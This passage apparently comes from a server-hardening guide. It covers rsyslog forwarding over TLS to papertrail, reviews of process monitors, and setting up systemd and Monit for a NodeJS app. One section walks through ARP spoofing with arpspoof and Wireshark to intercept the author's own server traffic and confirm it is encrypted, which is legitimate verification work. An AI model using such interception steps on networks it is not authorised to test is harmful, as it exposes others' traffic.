I am unsure whether it is still being actively developed. Most GNU/Linux distributions no longer ship with it. It only supports UDP and is lacking in features. From what I gather, it is single-threaded. I did not spend long looking at this as there was not much point. The following two offerings are the main players currently.
Rsyslog
Which ships with Debian and most other GNU/Linux distributions now. I like to do as little as possible to achieve my goals, and rsyslog fits this description for me. The rsyslog documentation is good. Rainer Gerhards wrote rsyslog and his blog provides many good insights into all things system logging. Rsyslog supports UDP, TCP and TLS. There is also the Reliable Event Logging Protocol (RELP), which Rainer created. Rsyslog is great at gathering, transporting and storing log messages, and includes some really neat functionality for dividing the logs. It is not designed to alert on logs; that is where the likes of Simple Event Correlator (SEC) comes in, as discussed below. Rainer Gerhards discusses why TCP is not as reliable as many think.
Syslog-ng
I did not spend too long here, as I did not see any features that I needed that were better than the defaults of rsyslog. Syslog-ng can correlate log messages, both real-time and off-line, and supports reliable and encrypted transport using TCP and TLS, message filtering, sorting, pre-processing, and log normalisation.
You may have devices in your network topology such as routers, switches, access points (APs) that do not have functionality to send their system logs via TCP, opting to rely on an unreliable transport such as UDP, often also not supporting any form of confidentiality. As this is not directly related to VPS, I will defer this portion to the Insufficient Logging countermeasures section within the Network chapter.
Rsyslog using TCP and local queuing, over TLS, to papertrail as your syslog collection, aggregation and reporting server. Papertrail does not support RELP, but say that is because their clients have not seen any issues with reliability in using plain TCP over TLS with local queuing. I must have been the first then. Maybe I am the only one that actually compares what is being sent against what is being received.
As I was setting this up and watching both ends, we had an internet outage of just over an hour. At that stage we had very few events being generated, so it was trivial to verify both ends after the outage. I noticed that once the ISP's router was back on-line and the events from the queue had moved to papertrail, there was in fact one missing.
Why did Rainer Gerhards create RELP if TCP with queues was good enough? That was a question that played on me for a while. In the end, it was obvious that TCP without RELP is not good enough if you want your logs to have the quality of integrity. At this stage it looks like the queues may lose messages. Rainer Gerhards said “In rsyslog, every action runs on its own queue and each queue can be set to buffer data if the action is not ready. Of course, you must be able to detect that the action is not ready, which means the remote server is off-line. This can be detected with plain TCP syslog and RELP“, so it can be detected without RELP.
You can aggregate log files with rsyslog or by using papertrail's remote_syslog daemon.
Alerting is available, including for inactivity of events.
Papertrail's documentation is good and support is reasonable. Due to the huge amounts of traffic they have to deal with, they are unable to trouble-shoot any issues you may have. If you still want to go down the papertrail path, to get started, work through (https://papertrailapp.com/systems/setup), which sets up your rsyslog to use UDP (specified in /etc/rsyslog.conf by a single @ in front of the target syslog server). I wanted something more reliable than that, so I use two @ signs, which specifies TCP.
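For example (the logsN host and the port are placeholders; papertrail assigns you your own):

    # /etc/rsyslog.conf forwarding line: one @ is UDP, two is TCP
    *.* @logsN.papertrailapp.com:39871
    *.* @@logsN.papertrailapp.com:39871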
As we are going to be sending our logs over the internet for now, we need TLS; check papertrail's “Encrypting with TLS” docs. Check papertrail's CA server bundle for integrity:
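Something along these lines, assuming the bundle URL that papertrail documents (the URL may well have changed):

    curl -s https://papertrailapp.com/tools/papertrail-bundle.pem | md5sum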
This should result in whatever it says on papertrail's “Encrypting with TLS” page. First problem here: the above mentioned page that lists the MD5 checksum is being served unencrypted, and even if you force the use of https, I get an invalid certificate error. My advice would be to contact papertrail directly and ask them what the MD5 checksum should be. Make sure it is the same as what the above command produces.
If it is, put the contents of that URL into a file called papertrail-bundle.pem, then scp the papertrail-bundle.pem into the web server's /etc dir. The command for that will depend on whether you are already on the web server and want to pull, or whether you are somewhere else and want to push. Then make sure the ownership is correct on the pem file.
Install rsyslog-gnutls:
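Hedged, via apt:

    sudo apt-get install rsyslog-gnutls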
Add the TLS config:
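A sketch of the five TLS lines referred to further down, using rsyslog's gtls netstream driver directives (the permitted peer is whatever papertrail's docs specify):

    $DefaultNetstreamDriverCAFile /etc/papertrail-bundle.pem
    $ActionSendStreamDriver gtls
    $ActionSendStreamDriverMode 1
    $ActionSendStreamDriverAuthMode x509/name
    $ActionSendStreamDriverPermittedPeer *.papertrailapp.com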
to your /etc/rsyslog.conf. Create an egress rule for your router to let traffic out to destination port 39871.
To generate a log message that uses your system syslogd config /etc/rsyslog.conf
, run:
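For example, with the logger utility:

    logger hi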
Should log “hi
” to /var/log/messages
and also to https://papertrailapp.com/events, but it was not.
Time to Trouble-shoot
Let us keep an eye on /var/log/messages
, where our log messages should be written to for starters. In one terminal run the following:
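Presumably a tail, for example:

    tail -f /var/log/messages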
OK, so let us run rsyslog in config checking mode:
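A hedged sketch; -N1 is rsyslogd's config validation level:

    sudo /usr/sbin/rsyslogd -N1 -f /etc/rsyslog.conf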
If the config is OK, the output will look like:
Some of the trouble-shooting resources I found were:
/usr/sbin/rsyslogd -version
will provide the installed version and supported features.The papertrail help was not that helpful, as we do not, and should not have telnet installed, we removed it remember? I can not ping from the DMZ as ICMP egress is not white-listed and I am not going to install tcpdump or strace on a production server. The more you have running, the more surface area you have, the greater the opportunities for exploitation, good for attackers, bad for defenders.
So how do we tell if rsyslogd is actually running if it does not appear to be doing anything useful?
Showing which files rsyslogd has open can be useful:
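lsof will do this; a hedged example:

    # All files (including network sockets) that rsyslogd currently has open
    sudo lsof -c rsyslogd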
To start with, this produced output like:
Which obviously showed rsyslogd's SYN packets were not getting through. I had some discussion with Troy from papertrail support around the reliability of plain TCP over TLS without RELP. I think if the server is business critical, then Improving the Strategy may be required. Troy assured me that they had never had any issues with logs being lost due to lack of reliability without RELP. Troy also pointed me to their recommended local queue options. After adding the queue tweaks and an rsyslogd restart, the above command now produced output like:
I could now see events in the papertrail web UI in real-time.
Socket Statistics (ss, the better netstat) should also show the established connection.
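A hedged example:

    # -t TCP, -n numeric, -p show the owning process
    sudo ss -tnp | grep rsyslog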
By default papertrail accepts TCP over TLS (TLS encryption check-box on, Plain text check-box off) and UDP. So if your TLS is not set-up properly, your events will not be accepted by papertrail. This is how I confirmed this to be true:
Confirm that our Logs are Commuting over TLS
Now, without installing anything on the web server or router, or physically touching the server sending packets to papertrail, or the router; using a switch (ubiquitous) rather than a hub; with no wire tap or multi-network interfaced computer; and no switch monitoring port available on expensive enterprise grade switches (along with the much needed access); I was basically down to two approaches I could think of. I like to achieve as much as possible with as little effort as possible, so I could not be bothered getting out of my chair and walking to the server rack.
On our MItM box, I set a static IP (address, netmask, gateway) in /etc/network/interfaces, and add domain, search and nameservers to /etc/resolv.conf. Follow that up with a service network-manager restart.
On the web server, run ifconfig -a to get its MAC: <your server MAC>. On the MItM box, run the same command to get its MAC: <MItM box MAC>. On the web server, run ip neighbour to find the MAC addresses associated with IP addresses (the local ARP table). The router will be: <router MAC>.
Now you need to turn your MItM box into a router temporarily. On the MItM box run:
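Presumably checking the kernel's forwarding flag:

    cat /proc/sys/net/ipv4/ip_forward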
If forwarding is on, you will see a 1. If it is not, add a 1 into the file:
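For example (needs root, hence the sh -c):

    sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'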
and check again to make sure forwarding is on. Now on the MItM box run:
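Something along the lines of the dsniff suite's arpspoof (the interface is a placeholder):

    # Tell <your server IP> that <router IP> is at our MAC address
    sudo arpspoof -i eth0 -t <your server IP> <router IP>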
This will continue to notify <your server IP>
that our MItM box MAC address belongs to <router IP>
. For all intents and purposes, we (MItM box) are now <router IP>
to the <your server IP>
box, but our IP address does not change. Now on the web server you can see that its ARP table has been updated and because arpspoof
keeps running, it keeps telling <your server IP>
that our MItM box is the router.
Now on our MItM box, while our arpspoof
continues to run, we start Wireshark listening on our eth0
interface or what ever interface you are bound to, and you can see that all packets that the web server is sending, we are intercepting and forwarding (routing) on to the gateway.
Now Wireshark clearly showed that the data was encrypted. I commented out the five TLS config lines in the /etc/rsyslog.conf
file -> saved -> restarted rsyslog -> turned on “Plain text” in papertrail and could now see the messages in clear text. Now when I turned off “Plain text”, papertrail would no longer accept syslog events. Excellent!
One of the nice things about arpspoof
is that it re-applies the original ARP mappings once it is done.
You can also tell arpspoof to poison the router's ARP table. This way any traffic going to the web server via the router, not originating from the web server, will be routed through our MItM box also.
Do not forget to revert the change to /proc/sys/net/ipv4/ip_forward
.
Exporting Wireshark Capture
You can use the File->Save As… option here for a collection of output types, or the way I usually do it is:
Trouble-shooting Messages that papertrail Never Shows
Check to see which arguments get passed into rsyslogd to run as a daemon in /etc/init.d/rsyslog
and /etc/default/rsyslog
. You will probably see a RSYSLOGD_OPTIONS=""
. There may be some arguments between the quotes.
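To run rsyslogd manually in debug mode (as referred to further down), a hedged sketch:

    # Stop the daemonised instance first
    sudo service rsyslog stop
    # -d debug, -n stay in the foreground; capture everything for later reading
    sudo /usr/sbin/rsyslogd -dn > /tmp/rsyslog-debug.log 2>&1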
The debug log can be quite useful for trouble-shooting. Also keep your eye on stderr, as you can see if it is writing anything out (most system start-up scripts throw this away). Once you have finished collecting the log: [CTRL]+[C]
To see if rsyslog is running:
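For example:

    pidof rsyslogd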
The stats that impstats produces show when you run into errors with an output, and also the state of the queues. You can also run impstats on the receiving machine if it is in your control; papertrail obviously is not. Put the following into your rsyslog.conf
file at the top and restart rsyslog:
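A sketch in rsyslog's legacy directive format:

    # Load the statistics module and emit counters every 60 seconds
    $ModLoad impstats
    $PstatInterval 60
    $PstatSeverity 7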
Now if you get an error like:
You can just change the /dev/xconsole to /dev/console. Xconsole is still in the config file for legacy reasons; it has not been cleaned up by the package maintainers.
By running rsyslogd manually in debug mode, I found an error when the message failed to send:
Standard Error when running rsyslogd manually produces:
With some help from the GnuTLS mailing list:
“That means that send() returned -1 for some reason.” You can enable more output by adding an environment variable GNUTLS_DEBUG_LEVEL=9
prior to running the application, and that should at least provide you with the errno
. This does not provide any more detail to stderr. However, thanks to Rainer, we now have a debug.gnutls parameter in the rsyslog code; if you specify this global variable in the rsyslog.conf and assign it a value between 0-10, you will have gnutls debug output going to rsyslog's debug log.
With the above strategy, I had issues where messages were getting lost between rsyslog and papertrail, I spent over a week trying to find the cause. As the sender, you have no insight into what papertrail is doing. The support team could not provide much insight into their service when I had to trouble-shoot things. They were as helpful as they could be though.
Reliability can be significantly improved by using RELP. Papertrail does not support RELP, so a next step could be to replace papertrail with a local network instance of an rsyslogd collector and Simple Event Correlator (SEC). Notification for inactivity of events could be performed by cron and SEC. Then for all your graphical event correlation, you could use LogAnalyzer, also created by Rainer Gerhards (rsyslog author). This would be more work to set up than an on-line service you do not have to set up. In saying that, you would have greater control and security, which for me is the big win here. Normalisation, also from Rainer, could be useful.
Another option instead of going through all the work of having to set-up and configure a local network instance of an rsyslogd collector, SEC and perhaps LogAnalyzer, would be to just deploy the SyslogAppliance which is a turn-key VM already configured with all the tools you would need to collect, aggregate, report and alert, as discussed in the Network chapter under Countermeasures, Insufficient Logging.
What I found, is that after several upgrades to rsyslog, the reliability issues seemed to improve, making me think that changes to rsyslog were possibly and probably responsible.
I recently performed an in-depth evaluation of a collection of tools, one of whose responsibilities is monitoring and performing actions on your processes and applications based on some other event(s). Some of these tools are very useful for security focussed tasks as well as generic dev-ops.
New Relic
New Relic is a Software as a Service (SaaS) provider that offers many products, primarily in the performance monitoring space, rather than security. Their offerings cost money, but may come into their own in larger deployments. I have used New Relic, it has been quick to start getting useful performance statistics on servers and helped my team isolate resource constraints.
Advanced Web Statistics (AWStats)
Unlike NewRelic which is SaaS, AWStats is FOSS. It kind of fits a similar market space as NewRelic though. You can find the documentation
here: http://www.awstats.org/docs/index.html.
Pingdom
Similar to New Relic but not as feature rich. As discussed below, Monit is a better alternative.
All the following offerings that I have evaluated, target different scenarios. I have listed the pros and cons for each of them and where I think they fit into a potential solution to monitor your web applications (I am leaning toward NodeJS) and make sure they keep running in a healthy state. I have listed the goals I was looking to satisfy.
For me, I have to have a good knowledge of the landscape before I commit to a decision and stand behind it. I like to know I have made the best decision based on all the facts that are publicly available. Therefore, as always, it is my responsibility to make sure I have done my research in order to make an informed and ideally the best decision possible. I am pretty sure my evaluation was unbiased, as I had not used any of the offerings other than forever before.
I looked at quite a few more than what I have detailed below, but the following candidates I felt were worth spending some time on.
Keep in mind that everyone's requirements will be different, so rather than tell you which to use, because I do not know your situation, I have listed the attributes (positive, negative and neutral) that I think are worth considering when making this choice. After the evaluation we make some decisions and start the configuration of the chosen offerings.
The following tools were my choice based on the above criterion.
You will have one of these running on your standard GNU/Linux box.
These are system and service managers for Linux. Upstart and the later systemd were developed as replacements for the traditional init daemon (Sysvinit), which all depend on init. Init is an essential package that pulls in the default init system. In Debian, starting with Jessie, systemd is your default system and service manager.
There is some helpful info on the differences between Sysvinit and systemd, links in the attributions chapter.
systemd
As I have systemd installed out of the box on my test machine (Debian Stretch), I will be using this for my set-up.
Documentation
There is a well written comparison with Upstart, systemd, Runit and even Supervisor.
Running the likes of the below commands will provide some good details on how these packages interact with each other:
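For example, apt's views of the dependency chains (package names as found on Debian):

    apt-cache depends init
    apt-cache depends systemd
    apt-cache depends systemd-sysv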
These system and service managers all run as PID 1
and start the rest of your system. Your Linux system will more than likely be using one of these to start tasks and services during boot, stop them during shutdown and supervise them while the system is running. Ideally you are going to want to use something higher level to look after your NodeJS application(s). See the following candidates.
forever, along with its web UI, can run any kind of script continuously (whether it is written in NodeJS or not). This was not always the case though. It was originally targeted toward keeping NodeJS applications running.
Requires NPM to install globally. We already have a package manager on Debian and all other main-stream Linux distros. Even Windows has package managers. Installing NPM just adds more attack surface area. Unless it is essential, I would rather do without NPM on a production server where we are actively working to reduce the installed package count and disable everything else we can. We could install forever on a development box and then copy to the production server, but it starts to turn the simplicity of a node module into something not as simple, which then makes native offerings such as Supervisor, Monit and even Passenger look even more attractive.
Overall Thoughts
For me, I am looking for a tool set that is a little smarter, knows when the application is struggling and when someone has tampered with it. Forever does not satisfy the requirements. There is often a balancing act between not doing enough and doing too much. If the offering “can” do too much but does not actually do it (get in your way), then it is not so bad, as you do not have to use all the features. In saying that, it is extra attack surface area that can and will be exploited; it is just a matter of time.
PM2 is younger than forever, but seems to have quite a few more features. I am not sure about it being production ready though. Let us elaborate.
I prefer the dark cockpit approach from my monitoring tools. What I mean by that is, I do not want to be told that everything is OK all the time. I only want to be notified when things are not OK. PM2 provides a display of memory and cpu usage of each app with pm2 monit
, I do not have the time to sit around watching statistics that do not need to be watched and most system administrators do not either, besides, when we do want to do this, we have perfectly good native tooling that system administrators are comfortable using. Amongst the list of commands that PM2 provides, most of this functionality can be performed by native tools, so I am not sure what benefit this adds.
PM2 also seems to provide logging. My applications provide their own logging and we have the systems logging which provides aggregates and singular logs, so again I struggle to see what PM2 is offering here that we do not already have.
As mentioned on the github README: “PM2 is a production process manager for Node.js applications with a built-in load balancer“. This “Sounds” and at the initial glance looks shiny. Very quickly you should realise there are a few security issues you need to be aware of though.
The word “production” is used, but it requires NPM to install globally. We already have a package manager on Debian and all other main-stream Linux distros. As previously mentioned, installing NPM adds unnecessary attack surface area. Unless it is essential, and it should not be, we really do not want another application whose sole purpose is to install additional attack surface in the form of extra packages. NPM contains a huge number of packages that we really do not want access to on a production server facing the internet. We could install PM2 on a development box and then copy it to the production server, but that starts to turn the simplicity of a node module into something not as simple, which then, as does forever, makes offerings like Supervisor, Monit and even Passenger look even more attractive.
At the time of writing this, PM2 is about four years old with about 440 open issues on github, most quite old, with 29 open pull requests.
Yes, it is very popular currently. That does not tell me it is ready for production though. It tells me the marketing is working.
“Is your production server ready for PM2?” That phrase alone tells me the mind-set behind the project. I would much sooner see it worded the other way around: is PM2 ready for my production server? Your production server(s) are what you have spent time hardening; I am not personally about to compromise that work by consuming a package that shows me no sign of up-front security considerations in its development. You are going to need a development server for this, unless you honestly want development tools (NPM, git, build-essential and NVM) installed on your production server? Not for me or my clients, thanks.
If you have considered the above concerns and can justify adding the additional attack surface area, check out the features if you have not already.
Features that Stand Out
They are also listed on the github repository. Just beware of some of the caveats. Like for the load balancing: “we recommend the use of node#0.12.0+ or node#0.11.16+. We do not support node#0.10.*’s cluster module anymore”. 0.11.16 is unstable, but hang on, I thought PM2 was a “production” process manager? OK, so we are happy to mix unstable in with something we label as production?
On top of NodeJS, PM2 will run the following scripts: bash, python, ruby, coffee, php, perl.
After working through the offered features, I struggled to find value in features that were not already offered natively as part of the GNU/Linux Operation System.
PM2 has Start-up Script Generation, which sounds great, but if using systemd as we do below, then it is just a few lines of config for our unit file. This is a similar process no matter what init system you have out of the box.
Documentation
The documentation has nice eye candy which I think helps to sell PM2.
PM2 has what they call an Advanced Readme which at the time of reviewing, didn’t appear to be very advanced and had a large collection of broken links.
Does it Meet Our Goals
Overall Thoughts
For me, the architecture does not seem to be heading in the right direction to be used on a production internet facing web server, where less is better, unless the functionality provided is truly unique and adds more value than the extra attack surface area removes. I would like to see this change, but I do not think it will, the culture is established.
Supervisor is a process manager with a lot of features and a higher level of abstraction than the likes of the above mentioned Sysvinit, upstart, systemd, Runit, etc, so it still needs to be run by an init daemon itself.
From the docs: “It shares some of the same goals of programs like launchd, daemontools, and runit. Unlike some of these programs, it is not meant to be run as a substitute for init as “process id 1”. Instead it is meant to be used to control processes related to a project or a customer, and is meant to start like any other program at boot time.” Supervisor monitors the state of processes, whereas a tool like Monit can perform many more types of tests and take whatever actions you define.
It is in the Debian repositories and is a trivial install on Debian and derivatives.
Documentation
Main web site (ReadTheDocs)
Does it Meet Our Goals
GET /healthcheck: if everything goes well it should return HTTP 200, if not then HTTP 5**. In some cases a restart of the process will solve the issue. httpok is a Supervisor event listener which makes GET requests to the configured URL. If the check fails or times out, httpok will restart the process. To enable httpok, the following lines have to be placed in supervisord.conf:
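A sketch, assuming httpok from the superlance package, a program named my-nodejs-app, and the /healthcheck route above:

    [eventlistener:httpok]
    command=httpok -p my-nodejs-app http://localhost:3000/healthcheck
    events=TICK_60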
Overall Thoughts
The documentation is quite good, easy to read and understand. I felt that the config was quite intuitive also. I already had systemd installed out of the box and did not see much point in installing Supervisor, as systemd appeared to do everything Supervisor could do, plus systemd is an init system, sitting at the bottom of the stack. In most scenarios you are going to have Sysvinit or a replacement of it (running with a PID of 1), so in many cases Supervisor, although it is quite nice, is kind of redundant.
Supervisor is better suited to running multiple scripts with the same runtime, for example a bunch of different client applications running on Node. This can be done with systemd and the others, but Supervisor is a better fit for this sort of thing, PM2 also looks to do a good job of running multiple scripts with the same runtime.
Is a utility for monitoring and managing daemons or similar programs. It is mature, actively maintained, free, open source and licensed with GNU AGPL.
It is in the Debian repositories (a trivial install on Debian and derivatives). The home page told me the binary was just under 500kB; the install however produced a different number:
Monit provides an impressive feature set for such a small package.
Monit provides far more visibility into the state of your application, and more control, than any of the offerings mentioned above. It is also generic; it will manage and/or monitor anything you throw at it, and it has the right level of abstraction. Often when you start working with a product you find its limitations, and they stop you moving forward; you end up settling for imperfection, or you swap the offering for something else, providing you have not already invested too much effort into it. For me Monit hit the sweet spot and never seems to stop you in your tracks. There always seems to be an easy, or at least relatively easy, way to get any “monitoring -> take action” sort of task done. What I also really like is that moving away from Monit would be relatively painless, other than what you would miss. The time investment / learning curve is very small, and some of it will be transferable in many cases. It is just config in the control file.
- Timestamp tests can be fooled with touch -r, providing you do it between Monit's cycles, and you do not necessarily know when those are unless you have permissions to look at Monit's control file. This provides defence in depth though.
- The httpd must be enabled in monitrc in order to run the Monit CLI and/or access the Monit http web UI. At first I thought “is this broken?” I could not even run monit status (a Monit command). ps told me Monit was running. Then I realised… it is secure by default. You have to actually think about it in order to expose anything. It was this that confirmed Monit was one of the tools for me.
- The permissions on the control file must be 0700 (u=rwx,g=,o=); Monit will complain and exit otherwise. Again, security by default.
Documentation
The following was the documentation I used in the same order and I found that the most helpful.
Does it Meet Our Goals
Overall Thoughts
There was an accepted answer on Stack Overflow that discussed a pretty good mix and approach to using the right tools for each job. Monit has a lot of capabilities, none of which you must use, so it does not get in your way, as many opinionated tools do when they dictate how you do things and what you must use in order to do them. I have been using Monit now for several years and just forget that it is even there, until it barks because something is not quite right. Monit allows you to leverage whatever you already have in your stack; it plays very nicely with all other tools. Monit under-sells and over-delivers. You do not have to install package managers or increase your attack surface other than [apt-get|aptitude] install monit. It is easy to configure and has lots of good documentation.
I have looked at Passenger before and it looked quite good then. It still does, with one main caveat: it is trying to do too much. One can easily get lost in the official documentation (compare the Monit install (a handful of commands covering all Linux distributions on one page) with the Passenger install (many pages to get through)). “Passenger is a web server and application server, designed to be fast, robust and lightweight. It runs your web applications with the least amount of hassle by taking care of almost all administrative heavy lifting for you.” I would like to see the actual weight rather than just the relative term “lightweight”; to me it does not look lightweight. The feeling I got when evaluating Passenger was similar to the feeling produced by my Ossec evaluation.
The learning curve is quite a bit steeper than all the previous offerings. Passenger has strong opinions that once you buy into could make it hard to use the tools you may want to swap in and out. I am not seeing the UNIX Philosophy here.
If you looked at the Phusion Passenger Philosophy when it was available (it seems to have been removed now), you would see some noteworthy comments. “We believe no good software has bad documentation”. If your software is 100% intuitive, the need for documentation should be minimal. Few software products are 100% intuitive, because we only have so much time to develop them. The comment around “the Unix way” is interesting also. At this stage I am not sure this is the Unix way. I would like to spend some time with someone or some team that has Passenger in production in a diverse environment and see how things are working out.
Passenger is not in the Debian repositories, so you would need to add the apt repository.
Passenger is seven years old at the time of writing this, but the NodeJS support is only just over two years old.
Features that Do Not really Stand Out
Sadly there were not many that stood out for me.
Phusion Passenger is a commercial product that has enterprise, custom and open source (which is free and has many features).
Documentation
The following was the documentation I used in the same order and I found that the most helpful.
#passenger
at irc.freenode.net
. I was on there for several days. There was very little activity.Does it Meet Our Goals
Overall Thoughts
I spent quite a while reading the documentation. I just think it is doing too much. I prefer stronger, single focused tools that do one job, do it well, and play nicely with all the other kids in the sand pit. You pick the tool up and it is just intuitive how to use it, and you end up reading docs only to confirm how you think it should work. For me, this was not my experience with Passenger.
At this point it was fairly clear as to which components I would like to use to keep my NodeJS application(s) monitored, alive and healthy along with any other scripts and processes.
Systemd and Monit.
Going with the default for the init system should give you a quick start and provide plenty of power. Plus it is well supported, reliable, feature rich and you can manage anything/everything you want without installing extra packages.
For the next level up, I would choose Monit. I have now used it in production and it has taken care of everything above the init system with a very simple configuration. I feel it has a good level of abstraction, plenty of features, never gets in the way, and integrates nicely into your production OS(s) with next to no friction.
So we have installed Monit with an apt-get install monit
and we are ready to start configuring it.
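A quick look at the process list, something like:

    ps -e | grep monit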
Will reveal that Monit is running:
The first thing we need to do is make some changes to the control file (/etc/monit/monitrc
in Debian). The control file has sensible defaults already. At this stage I do not need a web UI accessible via localhost or any other hosts, but it still needs to be turned on and accessible by at least localhost. Here is why:
“Note that if HTTP support is disabled, the Monit CLI interface will have reduced functionality, as most CLI commands (such as “monit status”) need to communicate with the Monit background process via the HTTP interface. We strongly recommend having HTTP support enabled. If security is a concern, bind the HTTP interface to local host only or use Unix Socket so Monit is not accessible from the outside.”
In order to turn on the httpd, all you need in your control file for that is:
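Something along these lines, bound to localhost only:

    set httpd port 2812 and
        use address localhost  # only accept connections from localhost
        allow localhost        # allow localhost to connect to the server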
If you want to receive alerts via email, then you will need to configure that. Then on reload you should get start and stop events (when you quit).
Now if you issue a curl localhost:2812, you should get the web UI's response of an html page. Now you can start to play with the Monit CLI. Monit can also be seen listening in the netstat output above where we disabled and removed services.
Now to stop the Monit background process use:
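That being:

    monit quit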
You can find all the arguments you can throw at Monit in the documentation under Arguments, or just issue:
To check the control file for syntax errors:
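Hedged:

    monit -t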
Also keep an eye on your log file which is specified in the control file:
set logfile /var/log/monit.log
Right. So what happens when Monit dies?
Now you are going to want to make sure your monitoring tool that can be configured to take all sorts of actions never just stops running, leaving you flying blind. No noise from your servers means all good right? Not necessarily. Your monitoring tool just has to keep running, no ifs or buts about it. So let us make sure of that now.
When Monit is apt-get install'ed on Debian, it gets installed and configured to run as a daemon. This is defined in Monit's init script.
Monit's init script is copied to /etc/init.d/ and the run levels are set up for it upon installation. This means whenever a run level is entered, the init script will be run, taking either the single argument of stop
(example: /etc/rc0.d/K01monit
), or start
(example: /etc/rc2.d/S17monit
). Remember we discussed run levels previously?
systemd to the rescue
Monit is very stable, but if for some reason it dies, then it will not be automatically restarted again. In saying that I have never had Monit die on any of my servers being monitored.
This is where systemd comes in. systemd is installed out of the box on Debian Jessie on-wards. Ubuntu uses Upstart on 14.10 which is similar, Ubuntu 15.04 uses systemd. Both SysV init and systemd can act as drop-in replacements for each other or even work along side of each other, which is the case in Debian Jessie. If you add a unit file which describes the properties of the process that you want to run, then issue some magic commands, the systemd unit file will take precedence over the init script (/etc/init.d/monit
).
Before we get started, let us get some terminology established. The two concepts in systemd we need to know about are unit and target.
A unit file needs a [Unit] directive at a minimum. The syntax of the unit files and the target files was derived from Microsoft Windows .ini files. Now I think the idea is that if you want to have a [Service] directive within your unit file, then you would append .service to the end of your unit file name.
Now in Debian there are two places that systemd looks for unit files… In order from lowest to highest precedence, they are as follows:
- /lib/systemd/system/ (prefix with the /usr dir for archlinux): unit files provided by installed packages. Have a look in here for many existing examples of unit files.
- /etc/systemd/system/: unit files created by the system administrator.
As mentioned above, systemd should be the first process started on your Linux server. systemd reads the different targets and runs the scripts within the specific target's target.wants
directory (which just contains a collection of symbolic links to the unit files). For example the target file we will be working with is the multi-user.target
file (actually we do not touch it; systemctl does that for us, as per the magic commands mentioned above). Just as systemd has two locations in which it looks for unit files, I think this is probably the same for the target files, although there were no target files in the system administrator defined unit location, but there were some target.wants
files there.
systemd Monit Unit file
I found a template that Monit had already provided for a unit file in
/usr/share/doc/monit/examples/monit.service
. There is also one for Upstart. Copy that to where the system administrator unit files should go, as mentioned above, and make the change so that systemd restarts Monit if it dies for whatever reason. Check the Restart=
options on the systemd.service man page. The following is what my initial unit file looked like:
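My exact file is not shown here; a sketch based on the shipped template plus the restart change just discussed (Restart=always is one reasonable choice so Monit comes back however it died):

    [Unit]
    Description=Pro-active monitoring utility for unix systems
    After=network.target

    [Service]
    Type=simple
    ExecStart=/usr/bin/monit -I -c /etc/monit/monitrc
    ExecStop=/usr/bin/monit quit
    ExecReload=/usr/bin/monit reload
    Restart=always

    [Install]
    WantedBy=multi-user.target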
Now, some explanation. Most of this is pretty obvious. The After=
directive just tells systemd to make sure the network.target
file has been acted on first and of course network.target
has After=network-pre.target
which does not have a lot in it. I am not going to go into this now, as I do not really care too much about it. It works. It means the network interfaces have to be up first. If you want to know how and why, check the systemd NetworkTarget documentation. As for Type=simple, again check the systemd.service man page.
Now to have systemd control Monit, Monit must not run as a background process (the default). To do this, we can either add the set init
statement to Monit’s control file or add the -I
option when running systemd, which is exactly what we have done above. The WantedBy=
is the target that this specific unit is part of.
Now we need to tell systemd to create the symlinks in the /etc/systemd/system/multi-user.target.wants
directory and other things. See the systemctl man page for more details about what enable actually does if you want them. You will also need to start the unit.
Now what I like to do here is:
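That is, take a before shot of the wants directory:

    ls -l /etc/systemd/system/multi-user.target.wants/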
Then compare this output once we enable the service:
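Hedged:

    sudo systemctl enable monit.service
    # List the wants directory again; a monit.service symlink should now be present
    ls -l /etc/systemd/system/multi-user.target.wants/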
systemd now knows about monit.service
Outputs:
Now start the service:
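For example:

    sudo systemctl start monit.service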
Now you can check the status
of your Monit service again. This shows terse runtime information about the units or PID you specify (monit.service in our case).
By default this function will show you 10 lines of output. The number of lines can be controlled with the --lines=
option:
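For example:

    sudo systemctl --lines=20 status monit.service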
Now try killing the Monit process. At the same time, you can watch the output of Monit in another terminal; tmux or screen is helpful for this:
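A sketch:

    # In one pane, watch Monit's log
    tail -f /var/log/monit.log
    # In another, send the default SIGTERM to the monit process
    sudo kill $(pidof monit)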
Or you can emulate a nastier termination with SIGKILL or even SEGV (which may kill monit faster).
Now when you run another status
command you should see the PID has changed. This is because systemd has restarted Monit.
When you need to make modifications to the unit file, you will need to run the following command after save:
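For unit file changes that is the daemon reload:

    sudo systemctl daemon-reload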
When you need to make modifications to the running service's configuration file (/etc/monit/monitrc for example), you will need to run the following command after save:
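For example:

    sudo systemctl restart monit.service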
Right, we know systemd is always going to be running. So let us use it to take care of the coarse grained service control, that is, keeping your NodeJS service alive.
Using systemd
systemd my-nodejs-app Unit file
You will need to know where your NodeJS binary is. The following will provide the path:
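Hedging on the Debian binary name:

    which node
    # or, on installs that use the renamed binary
    which nodejs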
Now create a systemd unit file my-nodejs-app.service
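A sketch only; the user, paths and app entry point are placeholders:

    [Unit]
    Description=My NodeJS application
    After=network.target

    [Service]
    Type=simple
    User=my-nodejs-app
    Group=my-nodejs-app
    Environment=NODE_ENV=production
    ExecStart=/usr/bin/node /srv/my-nodejs-app/app.js
    Restart=on-failure

    [Install]
    WantedBy=multi-user.target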
Add the system user and group so systemd can actually run your service as the user you have specified.
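On Debian, something along these lines (the name is a placeholder):

    sudo adduser --system --group --no-create-home my-nodejs-app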
Now, as we did above, go through the same procedure of enabling, starting and verifying your new service.
Make sure you have your directory permissions set-up correctly and you should have a running NodeJS application that when it dies will be restarted automatically by systemd.
Do not forget to backup all your new files and changes in case something happens to your server.
We are done with systemd for now. The following are some useful resources that I have used:
killing processes
Using Monit
Now just configure your Monit control file. You can spend a lot of time here tweaking a lot more than just your NodeJS application. There are loads of examples around, and the control file itself has lots of commented out examples also. You will find the following the most helpful:
There are a few things that had me stuck for a while. By default Monit only sends alerts on change (the dark cockpit approach), not on every cycle if the condition stays the same, unless when you set up your alert you append receive all alerts, so that it looks like this:
There are quite a few things you just work out as you go. The main part I used to health-check my NodeJS app was:
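My actual stanza is not shown here; a sketch using Monit's http protocol test against the /healthcheck route mentioned earlier (name, port and paths are placeholders):

    check host my-nodejs-app with address 127.0.0.1
        start program = "/bin/systemctl start my-nodejs-app"
        stop program  = "/bin/systemctl stop my-nodejs-app"
        if failed port 3000 protocol http
            request "/healthcheck"
            with timeout 10 seconds
        then restart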
Carry on and add to, or uncomment and modify, the monitrc file, with the likes of:
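For example, some generic system checks in Monit's own syntax (thresholds are placeholders; older Monit versions want an explicit hostname instead of $HOST):

    check system $HOST
        if loadavg (5min) > 2 then alert
        if memory usage > 80% then alert
        if cpu usage (user) > 70% for 8 cycles then alert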
This is where collectd and graphite come to the party. Both tools do one thing, do it well, and are independent of each other, but are often used together.
